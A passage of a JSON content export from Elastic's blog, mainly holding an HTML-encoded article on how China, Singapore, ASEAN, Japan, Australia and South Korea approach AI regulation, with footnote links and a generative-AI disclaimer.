security","updated_at":"2020-06-17T03:37:36.199Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-10-07T20:06:58.974Z","user":"blt36e890d06c5ec32c"},"_content_type_uid":"tags_topic"}],"tags_use_case":[{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt9f3033eaacd184dd","ACL":{},"created_at":"2022-09-13T16:43:44.540Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"logstash","label_l10n":"Logstash","tags":[],"title":"Logstash","updated_at":"2022-09-13T16:43:44.540Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.249Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt49d4b623ebdfdd90","ACL":{},"created_at":"2022-09-13T16:43:19.010Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2022-09-13T16:43:19.010Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.239Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt38a6c014d6bd5ecb","ACL":{},"created_at":"2021-06-02T15:27:49.854Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"stack","label_l10n":"Stack","tags":[],"title":"Stack","updated_at":"2021-07-13T22:00:22.378Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.258Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt35c347a18686f701","_version":1,"title":"05-station (1).jpeg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-19T18:17:35.347Z","updated_at":"2024-12-19T18:17:35.347Z","content_type":"image/jpeg","file_size":"33369","filename":"05-station_(1).jpeg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-19T18:24:06.446Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt35c347a18686f701/6764633f943056583a42ac11/05-station_(1).jpeg"},"title":"Reducing CVEs in Elastic container images","title_l10n":"Reducing CVEs in Elastic container images","updated_at":"2024-12-19T18:23:16.518Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/reducing-cves-in-elastic-container-images","publish_details":{"time":"2024-12-19T18:24:05.829Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt884fd002e22c74f2","_version":11,"locale":"en-us","ACL":{},"abstract_l10n":"As governments and regulatory bodies try to catch up to the rapid pace of AI's evolution, we explore the current state of AI regulation in Asia and its varying approaches.","author":["bltac8c8d1e2a12565e","blt4912a365604f6024"],"category":["bltc17514bfdbc519df"],"created_at":"2024-12-18T19:06:40.690Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs60f2f1a13dc0d2ca"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eArtificial intelligence (AI) is rapidly transforming the world — revolutionizing industries and reshaping the way we work and live. As AI advances, governments across Asia are grappling with the challenge of regulating this complex technology. While the concept of AI is not new, its development has been increasing at such a rapid rate that the law is playing catch-up.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis article explores the evolution of AI regulation in Asia, which is taking place in three primary ways:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eChina has enacted specific AI regulations. \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eBut these regulations are vague and could complicate compliance.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSingapore and the ASEAN region have taken a soft, non-binding, and voluntary approach\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e with the aim of driving AI growth and innovation. However, it is unclear if governments can quickly identify and mitigate emerging risks.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSouth Korea, with its proposed AI Basic Law\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e,\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eaims to draw a distinction between high-impact AI applications where more guardrails may be required and low-risk areas where a more relaxed approach may make better sense. Japan and Australia, which are currently adopting a similar approach to Singapore, have discussions drawing similar distinctions between high-impact AI and low-risk areas (though the specific distinctions might differ).\u003c/span\u003e\u003c/li\u003e\u003c/ol\u003e"},{"title_l10n":"China: Enacting specific AI regulations","_metadata":{"uid":"cs223c4924bfff7811"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn 2017, China issued a comprehensive three-step strategy, \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eNew Generation Artificial Intelligence Development Plan\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, with the intent to propel China to the forefront of AI innovation.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSince then, China has enacted a series of AI-specific legislations, such as:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAdministrative Provisions on Recommendation Algorithms in Internet-based Information Services\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e (w.e.f. 2022), which “contain several mandatory requirements for providers of the [algorithm recommendation services]”\u003csup\u003e1\u003c/sup\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAdministrative Provisions on Deep Synthesis in Internet-based Information Services\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e (w.e.f. since 2023), which seeks to strengthen the integrated management of the internet information services\u003csup\u003e2\u003c/sup\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eInterim Measures for the Management of Generative Artificial Intelligence Services (“GAI Measures”)\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e (w.e.f. since 2023), which sets out the rules to regulate those who provide generative AI capabilities to the public within Mainland China\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eScientific and Technological Ethics Review Regulation (Trial)\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e (w.e.f. 2023), which requires entities engaging in scientific research activities in life sciences, medicine, or AI to establish an ethics committee\u003csup\u003e3\u003c/sup\u003e\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHowever, these AI regulations themselves do not impose penalties. Instead, penalties can be incurred under existing laws, such as the cybersecurity law, the data security law, the Personal Information Protection Law (PIPL), China’s Civil Code, and criminal law.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOn the face of it, China is taking a “hard law” approach, implementing regulations that outline liability provisions for violations and noncompliance. This could attract both civil and criminal penalties and even possible business cessation under existing laws.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThese regulations are vague (quite unlike the approach taken by the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/eu-ai-act\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEU AI Act\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e) as they do not have a clear definition of AI or generative AI. This makes implementation, compliance, and enforcement difficult for both government and potentially affected organizations.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Singapore, the ASEAN region, Japan, and Australia: A soft, voluntary approach","_metadata":{"uid":"csfdd9940880331f20"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOn the other end of the spectrum, several countries are taking a more voluntary approach.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Singapore","_metadata":{"uid":"cs6f4f9b96b8414c7f"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSingapore has taken the lead in the voluntary approach space with the release of its nonbinding framework and strategy:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eThe Model AI Governance Framework in 2019\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e (updated in 2020) sought to provide “detailed and readily-implementable guidance to private sector organizations to address key ethical and governance issues when deploying AI solutions.”\u003csup\u003e4\u003c/sup\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eThe Model AI Governance Framework for Generative AI\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e (published in 2024) was built on the aforementioned Model AI Governance Framework and pertains to generative AI.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eThe National Artificial Intelligence Strategy 2.0 to Uplift Singapore’s Social and Economic Potential\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e (released in 2023) “outlines [Singapore’s] ambition and commitment to building a trusted and responsible AI ecosystem, driving innovation and growth through AI, and empowering [the people of Singapore] and businesses to understand and engage with AI.”\u003csup\u003e5\u003c/sup\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFurther, Singapore’s AI Verify Foundation was established with the aim of “harness[ing] the collective power and contributions of the global open-source community to develop AI testing tools to enable responsible AI.”\u003csup\u003e6\u003c/sup\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThese are nonbinding and seek only to provide guidance. Liability for any related violations would be governed by the current existing laws, such as the Personal Data Protection Act, the Copyright Act, and the Computer Misuse Act. It remains to be seen whether the government can quickly identify and mitigate emerging risks under such a framework.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"ASEAN","_metadata":{"uid":"cs7a2f2bbe9ee6c3d0"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eASEAN released a guide on AI Governance and Ethics in February 2024, which is a nonbinding practical guide for companies in ASEAN that “focuses on encouraging alignment within ASEAN and fostering the interoperability of AI frameworks across jurisdictions.”\u003csup\u003e7\u003c/sup\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIt bears noting that a large section of the guide sets out examples from Singapore, suggesting a softer and more voluntary approach toward AI regulation within the region. It is not yet known if this will be adopted in other ASEAN countries.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Japan","_metadata":{"uid":"cs4517c41878c491fd"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eJapan has taken a gradual approach and has relied on nonbinding guidance, such as the AI Guidelines for Business Version 1.0 (published in April 2024), which sets out “unified guiding principles in AI governance in Japan to promote the safe and secure use of AI.”\u003csup\u003e8\u003c/sup\u003e As it is nonbinding, it requires voluntary efforts and support from the community. Liability for any related violations would be governed by the current existing laws, such as the civil code, Product Liability Act, and the penal code.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eJapan also launched the Hiroshima AI Process Comprehensive Policy Framework in May 2023, which was endorsed by the other G7 countries. This Hiroshima framework sets out the “principles that should be applied to all actors across the AI lifecycle […]\u0026nbsp; such as publicly reporting advanced AI systems’ capabilities and domains of inappropriate use and protecting intellectual property.”\u003csup\u003e9\u003c/sup\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIt bears noting that in January 2023, a draft bill \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eBasic Law for Promoting Responsible AI\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e was submitted with the aim of regulating developers to a certain scale.\u003csup\u003e10\u003c/sup\u003e The draft bill also seeks to include regular reporting, violations of which may result in fines or criminal penalties.\u003csup\u003e11\u003c/sup\u003e It does, however, seek to differentiate between conducting safety verification for AI in “high-risk areas”\u003csup\u003e12\u003c/sup\u003e and those that are not in those areas.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIf the draft AI bill is adopted, it will represent a shift from a soft, voluntary, nonbinding approach to a more “hard law” stance. It is not yet known if such a stance would result in a stricter regulation like the EU AI Act or remain vague in terms of AI definitions as per China’s AI legislations.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Australia","_metadata":{"uid":"cs4758a69ed1b42428"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLike Japan, Australia has adopted a voluntary nonbinding approach. It has not enacted any specific statutes or regulations directly regulating AI. Similarly, liability for any related violations would be governed by the current existing laws, such as the Online Safety Act 2021, Privacy Act 1988, and Australian Consumer Law.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eInstead, Australia published a series of guidelines and consultation papers focusing on AI:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe AI Ethics Principles published in 2019 sets out eight voluntary principles for responsible design and the development and implementation of AI.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe Australian government published its interim response in January 2024 to the June 2023 consultation conducted by the Commonwealth Department of Industry, Science and Resources: Safe and responsible AI in Australia.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn yet another similarity, the Australian government’s interim response recognizes that the “current regulatory frameworks do not fully address the risks of AI.”\u003csup\u003e13\u003c/sup\u003e The Australian government wants the “design, development and deployment of AI in legitimate high-risk settings to be safe and reliable… [however] it aims to ensure that AI can continue being used in low-risk settings largely unimpeded.”\u003csup\u003e14\u003c/sup\u003e The Australian government indicates that it intends to achieve this by “clarifying and strengthening laws to safeguard citizens” and “using testing, transparency and accountability measures to prevent harms from occurring in high-risk settings.”\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003csup\u003e15\u003c/sup\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIt is not yet known if any future AI regulations developed by the Australian government would be strict or remain vague on AI definitions, which may make them difficult to enforce.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"South Korea: Focusing on high-impact AI and GenAI","_metadata":{"uid":"cs3aff634e7e3d7fee"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSouth Korea’s AI law, the draft Basic Law on the Development of Artificial Intelligence and Creation and Creation of Trust Base has been passed by the South Korean National Assembly’s Legislative and Judiciary Committee. The AI Basic Law (once passed) will differentiate between “high-impact AI” (i.e., those that have a significant impact on public health, safety, and fundamental rights) and other AI applications that do not fall within this category. The AI Basic Law will mirror the EU AI Act’s risk management obligations particularly for “high-impact AI.”\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003csup\u003e16\u003c/sup\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBusinesses providing high-impact AI products or services would have to assess the impact on fundamental rights, and notification requirements are imposed for high-impact AI or GenAI with clear labels distinguishing AI-generated content. Foreign AI businesses meeting certain thresholds as set out in the AI Basic Law may have to appoint domestic agents in Korea to handle such compliance and reporting obligations.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIt is likely that the draft AI Basic Law may be passed by the end of 2024.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Looking ahead","_metadata":{"uid":"cse64fb85a991bfc81"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe rapid evolution of AI brings both unparalleled opportunities and significant challenges. While AI has the potential to revolutionize industries like healthcare, education, and public services, it also raises critical concerns, such as bias, data privacy, and the ethical implications. Striking the right balance between fostering innovation and ensuring ethical responsibility is imperative.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCollaboration among governments, software developers, industry leaders, and academic institutions is essential to developing thoughtful and effective AI regulations. Initiatives, such as regulatory sandboxes, independent algorithm audits, and the adoption of responsible design principles, can help create an environment where AI is developed and deployed safely. Such measures ensure that AI enhances human potential while mitigating risks.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2cedfd5324aeddd2"}}},{"callout":{"title_l10n":"Related resources:","_metadata":{"uid":"cs97cb7fdc0bebe014"},"paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBlog: \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/united-states-senate-ai-roadmap\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eUnpacking the US Senate’s new AI roadmap\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEbook: \u003c/span\u003e\u003ca href=\"https://www.elastic.co/industries/public-sector/how-search-ai-transforms-call-centers-citizen-support\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow Search AI is transforming citizen support\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBlog: \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/eu-ai-act\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe EU AI Act: What you need to know\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csbde9a8a62a2f111e"},"header_style":"H2","paragraph_l10n":"\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e1\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.lexology.com/library/detail.aspx?g=08867c3e-7ded-43d2-af2b-8f09878ef7a6#:~:text=The%20Provisions%20contain%20several%20mandatory,establish%20and%20improve%20the%20feature\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eProvisions on the Administration of Algorithm Recommendation of Internet Information Services in China, Lexology, March 20, 2022\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e.\u003c/span\u003e \u003cbr /\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e2\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003ca href=\"https://www.gov.cn/zhengce/zhengceku/2022-12/12/content_5731431.htm\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eCyberspace Administration of China Ministry of Industry and Information Technology of the People’s Republic of China Order No. 12\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e.\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e3\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003ca href=\"https://www.hankunlaw.com/en/portal/article/index/cid/8/id/13701.html\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eChina Released New Ethics Rules Requiring Company’s Internal EC, Han Kun Law Offices\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e.\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e4\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003ca href=\"https://www.pdpc.gov.sg/help-and-resources/2020/01/model-ai-governance-framework\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eSingapore’s Approach to AI Governance, Personal Data Protection Commission of Singapore\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e.\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e5\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003ca href=\"https://www.smartnation.gov.sg/media-hub/press-releases/04122023/\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eNational Artificial Intelligence Strategy 2.0 to Uplift Singapore’s Social and Economic Potential\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e.\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e6\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003ca href=\"https://aiverifyfoundation.sg/ai-verify-foundation/\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eAI Verify Foundation\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e.\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e7\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eSupra\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e n. 6.\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e8\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003ca href=\"https://www.meti.go.jp/shingikai/mono_info_service/ai_shakai_jisso/pdf/20240419_9.pdf\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eProvisional Translation of the AI Guidelines for Business Version 1.0\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e.\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e9\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003ca href=\"https://www.japan.go.jp/kizuna/2024/02/hiroshima_ai_process.html#:~:text=The%20framework%20presents%20a%20set,of%20principles%20that%20should%20be\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eThe Hiroshima AI Process: Leading the Global Challenge to Shape Inclusive Governance for Generative AI\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e.\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e10\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;Publishing of a working draft of a “Basic Law for Promoting Responsible AI” submitted to a project team of the Liberal Democratic Party of jap.\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e11\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eSupra\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e n. 10\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e12\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eSupra\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e n. 10\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e13\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003ca href=\"https://www.industry.gov.au/news/australian-governments-interim-response-safe-and-responsible-ai-consultation\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eThe Australian Government’s Interim Response to Safe and Responsible AI Consultation\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e.\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e14\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eSupra\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e n. 13.\u003cbr /\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e15\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eSupra\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e n. 13.\u003cbr /\u003e\u003c/span\u003e\u003csup\u003e\u003c/sup\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e16\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003ca href=\"https://babl.ai/south-korea-unveils-unified-ai-act/#:~:text=The%20South%20Korean%20AI%20Basic,for%20oversight%20and%20policy%20guidance\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eSouth Korea Unveils Unified AI Act\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e.\u003c/span\u003e"}],"_metadata":{"uid":"csdfae5354b1236322"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8793831e77c43808"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 